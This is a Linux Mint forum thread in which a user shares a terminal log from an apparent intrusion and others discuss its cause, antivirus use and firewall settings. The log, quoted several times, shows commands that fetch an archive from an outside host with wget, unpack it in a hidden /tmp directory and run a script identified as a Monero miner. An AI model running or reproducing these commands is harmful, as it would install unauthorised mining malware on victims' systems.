How did I get hacked? - Solved
Forum rules
Before you post read how to get help. Topics in this forum are automatically closed 6 months after creation.
Before you post read how to get help. Topics in this forum are automatically closed 6 months after creation.
How did I get hacked? - Solved
Hi all, hoping someone can help me with some security advice.
I recently installed Linux Mint Cinnamon 18.3 on one of my boxes. I left it running overnight with an open Terminal window (I was running Handbrake on a bunch of my DVDs). The following moning I found evidence in the Terminal window that I had been hacked - the commands below had been run (I've omitted the output from the commands as there was a lot of it):
peter@TheBeast /media/peter/ISO2 $ lspci
peter@TheBeast /media/peter/ISO2 $ cat /proc/cpuinfo
peter@TheBeast /media/peter/ISO2 $ cd /tmp
peter@TheBeast /tmp $ mkdir ...
peter@TheBeast /tmp $ cd ...
peter@TheBeast /tmp/... $ wget mafiagalati.hi2.ro/aeon.tgz
peter@TheBeast /tmp/... $ tar xvf aeon.tgz
peter@TheBeast /tmp/... $ rm -rf aeon.tgz
peter@TheBeast /tmp/... $ cd .x
peter@TheBeast /tmp/.../.x $ chmpd +x *
peter@TheBeast /tmp/.../.x $ chmod +x *
peter@TheBeast /tmp/.../.x $ screen
peter@TheBeast /tmp/.../.x $ ./x.sh
peter@TheBeast /tmp/.../.x $ ^C
peter@TheBeast /tmp/.../.x $
I've done some searching and this appears to be an attempt to hijack my PC to mine some crypto currency (Monero or Aeon, not sure). Anyway, the "screen" command failed (not installed) and the shell script x.sh issued a whole load or error messages so the hacker was out of luck.
I don't have anti-virus installed (I know, big mistake, but lesson learned) but I still don't understand how I got hacked. I only installed software from the Software Centre, and I only visited reputable sites mainly to get info on how to do things in Linux.
I switched the box off (after copying the evidence to another server) and will be reinstalling Linux Mint afresh before I use it again. I'm looking for advice on how to protect myself better, e.g. what anti-virus to install, and anything else I can do.
Thanks in advance.
I recently installed Linux Mint Cinnamon 18.3 on one of my boxes. I left it running overnight with an open Terminal window (I was running Handbrake on a bunch of my DVDs). The following moning I found evidence in the Terminal window that I had been hacked - the commands below had been run (I've omitted the output from the commands as there was a lot of it):
peter@TheBeast /media/peter/ISO2 $ lspci
peter@TheBeast /media/peter/ISO2 $ cat /proc/cpuinfo
peter@TheBeast /media/peter/ISO2 $ cd /tmp
peter@TheBeast /tmp $ mkdir ...
peter@TheBeast /tmp $ cd ...
peter@TheBeast /tmp/... $ wget mafiagalati.hi2.ro/aeon.tgz
peter@TheBeast /tmp/... $ tar xvf aeon.tgz
peter@TheBeast /tmp/... $ rm -rf aeon.tgz
peter@TheBeast /tmp/... $ cd .x
peter@TheBeast /tmp/.../.x $ chmpd +x *
peter@TheBeast /tmp/.../.x $ chmod +x *
peter@TheBeast /tmp/.../.x $ screen
peter@TheBeast /tmp/.../.x $ ./x.sh
peter@TheBeast /tmp/.../.x $ ^C
peter@TheBeast /tmp/.../.x $
I've done some searching and this appears to be an attempt to hijack my PC to mine some crypto currency (Monero or Aeon, not sure). Anyway, the "screen" command failed (not installed) and the shell script x.sh issued a whole load or error messages so the hacker was out of luck.
I don't have anti-virus installed (I know, big mistake, but lesson learned) but I still don't understand how I got hacked. I only installed software from the Software Centre, and I only visited reputable sites mainly to get info on how to do things in Linux.
I switched the box off (after copying the evidence to another server) and will be reinstalling Linux Mint afresh before I use it again. I'm looking for advice on how to protect myself better, e.g. what anti-virus to install, and anything else I can do.
Thanks in advance.
Last edited by LockBot on Wed Dec 28, 2022 7:16 am, edited 2 times in total.
Reason: Topic automatically closed 6 months after creation. New replies are no longer allowed.
Reason: Topic automatically closed 6 months after creation. New replies are no longer allowed.
Re: Not another Mint anti virus question.
Why do so many people say that you don't need anti-virus for Linux? I installed Linux Mint on one of my boxes a few weeks ago, I only installed software from the Software Centre, I only visited websites to find out how to do various simple things in Linux (VNC, Samba, and mounting disks), I didn't access any emails, and still I got hacked. After leaving my computer on overnight I found a Terminal window open with evidence of someone trying to hijack my PC to mine a cryptocurrency.
Don't say anti-virus is unnecessary, it most definitley is necessary
Don't say anti-virus is unnecessary, it most definitley is necessary
Re: Not another Mint anti virus question.
Because it's true.PPPeter wrote:Why do so many people say that you don't need anti-virus for Linux?
And if even if it's true that you got hacked, that is a very different thing than a virus. Let's not confuse things.
If your issue is solved, kindly indicate that by editing the first post in the topic, and adding [SOLVED] to the title. Thanks!
- Pjotr
- Level 24
- Posts: 20121
- Joined: Mon Mar 07, 2011 10:18 am
- Location: The Netherlands (Holland) 🇳🇱
- Contact:
Re: Not another Mint anti virus question.
More proof please.PPPeter wrote:Why do so many people say that you don't need anti-virus for Linux? I installed Linux Mint on one of my boxes a few weeks ago, I only installed software from the Software Centre, I only visited websites to find out how to do various simple things in Linux (VNC, Samba, and mounting disks), I didn't access any emails, and still I got hacked. After leaving my computer on overnight I found a Terminal window open with evidence of someone trying to hijack my PC to mine a cryptocurrency.
Don't say anti-virus is unnecessary, it most definitley is necessary
And even if you could supply this proof: why do you think that AV would have protected you against this hijack attempt?
Last edited by Pjotr on Wed Feb 07, 2018 7:48 am, edited 1 time in total.
Tip: 10 things to do after installing Linux Mint 21.3 Virginia
Keep your Linux Mint healthy: Avoid these 10 fatal mistakes
Twitter: twitter.com/easylinuxtips
All in all, horse sense simply makes sense.
Keep your Linux Mint healthy: Avoid these 10 fatal mistakes
Twitter: twitter.com/easylinuxtips
All in all, horse sense simply makes sense.
Re: Not another Mint anti virus question.
This would hd been the most stupid attacker, if he demonstrates his activity inn such an obvious way. Actually this looks for somebody had local access. No AV would be able to do something against that. - And you seem to have done the mistake to at least lock your screen over night.PPPeter wrote:After leaving my computer on overnight I found a Terminal window open with evidence of someone trying to hijack my PC to mine a cryptocurrency.
Or with another attempt to interpret your post: If you should really have done nothing except what you described: Than it would mean, that the attack would had been build inside of your system. Think about it.
If I look at your other post / thread, than it is obvious, that this, what you wrote here (installed nothing from outside of the official repositories) is simply untrue. Think about that also.
- Pjotr
- Level 24
- Posts: 20121
- Joined: Mon Mar 07, 2011 10:18 am
- Location: The Netherlands (Holland) 🇳🇱
- Contact:
Re: How did I get hacked?
A hacking attempt has nothing to do at all with a virus. So antivirus certainly wouldn't have helped against this. I advise to remove that newly installed AV from your system, because it'll only make it less secure.
It looks like a local attack: somebody who had physical access to your computer. If you leave the computer on during your absence, make sure that your screen is locked with a password.
Or even better: lock the room in which you've put your computer, because physical access will always remain a risk. No matter what.
Keep your system fully updated, don't install stuff from non-official repo's, be careful with browser add-ons, sandbox some high-risk applications (web browsers!) with Firejail and above all: use your common sense. Do all that, and then: relax, you're running Linux.
It looks like a local attack: somebody who had physical access to your computer. If you leave the computer on during your absence, make sure that your screen is locked with a password.
Or even better: lock the room in which you've put your computer, because physical access will always remain a risk. No matter what.
Keep your system fully updated, don't install stuff from non-official repo's, be careful with browser add-ons, sandbox some high-risk applications (web browsers!) with Firejail and above all: use your common sense. Do all that, and then: relax, you're running Linux.
Tip: 10 things to do after installing Linux Mint 21.3 Virginia
Keep your Linux Mint healthy: Avoid these 10 fatal mistakes
Twitter: twitter.com/easylinuxtips
All in all, horse sense simply makes sense.
Keep your Linux Mint healthy: Avoid these 10 fatal mistakes
Twitter: twitter.com/easylinuxtips
All in all, horse sense simply makes sense.
- Pjotr
- Level 24
- Posts: 20121
- Joined: Mon Mar 07, 2011 10:18 am
- Location: The Netherlands (Holland) 🇳🇱
- Contact:
Re: Not another Mint anti virus question.
This is the link to the separate topic that PPPeter has started for his problem:
viewtopic.php?f=18&t=263447
--Edit: rectified.
viewtopic.php?f=18&t=263447
--Edit: rectified.
Last edited by Pjotr on Wed Feb 07, 2018 7:56 am, edited 2 times in total.
Tip: 10 things to do after installing Linux Mint 21.3 Virginia
Keep your Linux Mint healthy: Avoid these 10 fatal mistakes
Twitter: twitter.com/easylinuxtips
All in all, horse sense simply makes sense.
Keep your Linux Mint healthy: Avoid these 10 fatal mistakes
Twitter: twitter.com/easylinuxtips
All in all, horse sense simply makes sense.
Re: Not another Mint anti virus question.
This thread is, what I mentioned in my last sentence.
- Pjotr
- Level 24
- Posts: 20121
- Joined: Mon Mar 07, 2011 10:18 am
- Location: The Netherlands (Holland) 🇳🇱
- Contact:
Re: Not another Mint anti virus question.
Yes, sorry, my wording was inexact. I'll rectify my previous message.Cosmo. wrote:This thread is, what I mentioned in my last sentence.
Tip: 10 things to do after installing Linux Mint 21.3 Virginia
Keep your Linux Mint healthy: Avoid these 10 fatal mistakes
Twitter: twitter.com/easylinuxtips
All in all, horse sense simply makes sense.
Keep your Linux Mint healthy: Avoid these 10 fatal mistakes
Twitter: twitter.com/easylinuxtips
All in all, horse sense simply makes sense.
Re: How did I get hacked?
Alone the line, where "chmod" had been mistyped at first makes it obvious, that there was a human at work.
- tdockery97
- Level 14
- Posts: 5058
- Joined: Sun Jan 10, 2010 8:54 am
- Location: Mt. Angel, Oregon
Re: Not another Mint anti virus question.
Proof: these are the commands (output omitted for brevity) I found in the terminal window:
peter@TheBeast /media/peter/ISO2 $ lspci
peter@TheBeast /media/peter/ISO2 $ cat /proc/cpuinfo
peter@TheBeast /media/peter/ISO2 $ cd /tmp
peter@TheBeast /tmp $ mkdir ...
peter@TheBeast /tmp $ cd ...
peter@TheBeast /tmp/... $ wget mafiagalati.hi2.ro/aeon.tgz
peter@TheBeast /tmp/... $ tar xvf aeon.tgz
peter@TheBeast /tmp/... $ rm -rf aeon.tgz
peter@TheBeast /tmp/... $ cd .x
peter@TheBeast /tmp/.../.x $ chmpd +x *
peter@TheBeast /tmp/.../.x $ chmod +x *
peter@TheBeast /tmp/.../.x $ screen
peter@TheBeast /tmp/.../.x $ ./x.sh
peter@TheBeast /tmp/.../.x $ ^C
peter@TheBeast /tmp/.../.x $
I agree, it must have been a very stupid atacker. And no, it was not someone sitting at the computer, unless they broke into my property while I was asleep and did nothing else other than sit at my PC and run a few commands. Yes, I did leave the computer unlocked - a mistake I won't make again. Clearly you guys think I'm trolling, I'm not, I'm just relaying my experience. Maybe you are right, maybe anti-virus wouldn't have helped, in which case please tell me what would have helped. And don't insinuate that I am lying. I don't even know how to install anything outside of the software center and I have never access my email accounts in Linux.
peter@TheBeast /media/peter/ISO2 $ lspci
peter@TheBeast /media/peter/ISO2 $ cat /proc/cpuinfo
peter@TheBeast /media/peter/ISO2 $ cd /tmp
peter@TheBeast /tmp $ mkdir ...
peter@TheBeast /tmp $ cd ...
peter@TheBeast /tmp/... $ wget mafiagalati.hi2.ro/aeon.tgz
peter@TheBeast /tmp/... $ tar xvf aeon.tgz
peter@TheBeast /tmp/... $ rm -rf aeon.tgz
peter@TheBeast /tmp/... $ cd .x
peter@TheBeast /tmp/.../.x $ chmpd +x *
peter@TheBeast /tmp/.../.x $ chmod +x *
peter@TheBeast /tmp/.../.x $ screen
peter@TheBeast /tmp/.../.x $ ./x.sh
peter@TheBeast /tmp/.../.x $ ^C
peter@TheBeast /tmp/.../.x $
I agree, it must have been a very stupid atacker. And no, it was not someone sitting at the computer, unless they broke into my property while I was asleep and did nothing else other than sit at my PC and run a few commands. Yes, I did leave the computer unlocked - a mistake I won't make again. Clearly you guys think I'm trolling, I'm not, I'm just relaying my experience. Maybe you are right, maybe anti-virus wouldn't have helped, in which case please tell me what would have helped. And don't insinuate that I am lying. I don't even know how to install anything outside of the software center and I have never access my email accounts in Linux.
Re: How did I get hacked?
Thanks for the replies. I am 100% certain it was not a local attack, I live alone and my property is secure. I haven't yet installed an anti-virus, perhaps I don't need to. I will certainly be more security conscious in future and shutdown the PC whenever I am not physically present. I only left it on as I was running Handbrake in batch mode. That's all done now.
Re switching on firewall, Steve Gibson's "Shields Up" gives my router a "perfect TruStealth" rating, whatever that means. Do I need to configure anything in Linux for a firewall?
Thanks again.
Re switching on firewall, Steve Gibson's "Shields Up" gives my router a "perfect TruStealth" rating, whatever that means. Do I need to configure anything in Linux for a firewall?
Thanks again.
Re: How did I get hacked?
the firewall in LinuxMint is installed, but not Turned On:
Open a Terminal and type
and that will tell you if the firewall is active or not. If it isn't then type
Open a Terminal and type
Code: Select all
sudo ufw status
Code: Select all
sudo ufw enable
Please edit your original post title to include [SOLVED] - when your problem is solved!
and DO LOOK at those Unanswered Topics - - you may be able to answer some!.
Re: Not another Mint anti virus question.
https://www.virustotal.com/#/file/21587 ... /detection
So you can be certain that AV wouldn't have helped...
...it appears to be a Monero miner btw:
https://github.com/fireice-uk/xmr-stak
So you can be certain that AV wouldn't have helped...
...it appears to be a Monero miner btw:
https://github.com/fireice-uk/xmr-stak
Re: Not another Mint anti virus question.
I don't see how remote access would open or leave open a terminal window on your desktop by using ssh or any terminal access, the only way that this could be done (afaik) is to use a vnc program that logs into DESKTOP:0.
You mentioned in an earlier post that you searched for info on vnc, did you go through setting up Desktop Sharing (vino)? If so did you leave it enabled and leave all security settings unchecked?
The firewall in Mint isn't enabled by default, was it enabled (to default allow-out, deny-in) during you episode?
Re: How did I get hacked? - Solved
Assuming that I've not misunderstood your post:
Just to dispel the myth... Linux is not magically immune to malware, you're just less likely to be infected in Linux than Windows. Note the "less likely", regardless of what others will continually tell you, it is not impossible.
Now, if you are 100% certain that nobody had physical access to your machine, and you don't have multiple personalities (I'm being serious, some people have such an illness) - then you was either hacked or you have a Poltergeist. Either way, it warrants further investigation. If you just get replies such as "you can't be hacked, it's Linux" - then I suggest you try a forum with better informed members, maybe devoted to security.
However, I suspect that someone was following an online guide... they never made it to the "Erasing your tracks" section - and the fact you can see all those commands reinforces the idea that they didn't know what they was doing.
So I suggest that you copy/paste your post to other forums more focused on security. You may never find out what happened, and it may never happen again, but you might get a meaningful explanation of what and why... though not who
Just to dispel the myth... Linux is not magically immune to malware, you're just less likely to be infected in Linux than Windows. Note the "less likely", regardless of what others will continually tell you, it is not impossible.
Now, if you are 100% certain that nobody had physical access to your machine, and you don't have multiple personalities (I'm being serious, some people have such an illness) - then you was either hacked or you have a Poltergeist. Either way, it warrants further investigation. If you just get replies such as "you can't be hacked, it's Linux" - then I suggest you try a forum with better informed members, maybe devoted to security.
However, I suspect that someone was following an online guide... they never made it to the "Erasing your tracks" section - and the fact you can see all those commands reinforces the idea that they didn't know what they was doing.
So I suggest that you copy/paste your post to other forums more focused on security. You may never find out what happened, and it may never happen again, but you might get a meaningful explanation of what and why... though not who
Re: How did I get hacked? - Solved
Don't be gullible. This poster just signed on so has no history on this forum. My conspiracy theory is that they made this up as they could not actually hack Linux themselves. This could be an attempt at spreading fear among the users. I for one am not afraid which is one reason I can see right through stuff like this.
I apologize to the OP if I am wrong but I do not believe in coincidence.
I apologize to the OP if I am wrong but I do not believe in coincidence.
- Pjotr
- Level 24
- Posts: 20121
- Joined: Mon Mar 07, 2011 10:18 am
- Location: The Netherlands (Holland) 🇳🇱
- Contact:
Re: How did I get hacked? - Solved
Nobody said that.
@Ozo: that thought has crossed my mind as well.
Tip: 10 things to do after installing Linux Mint 21.3 Virginia
Keep your Linux Mint healthy: Avoid these 10 fatal mistakes
Twitter: twitter.com/easylinuxtips
All in all, horse sense simply makes sense.
Keep your Linux Mint healthy: Avoid these 10 fatal mistakes
Twitter: twitter.com/easylinuxtips
All in all, horse sense simply makes sense.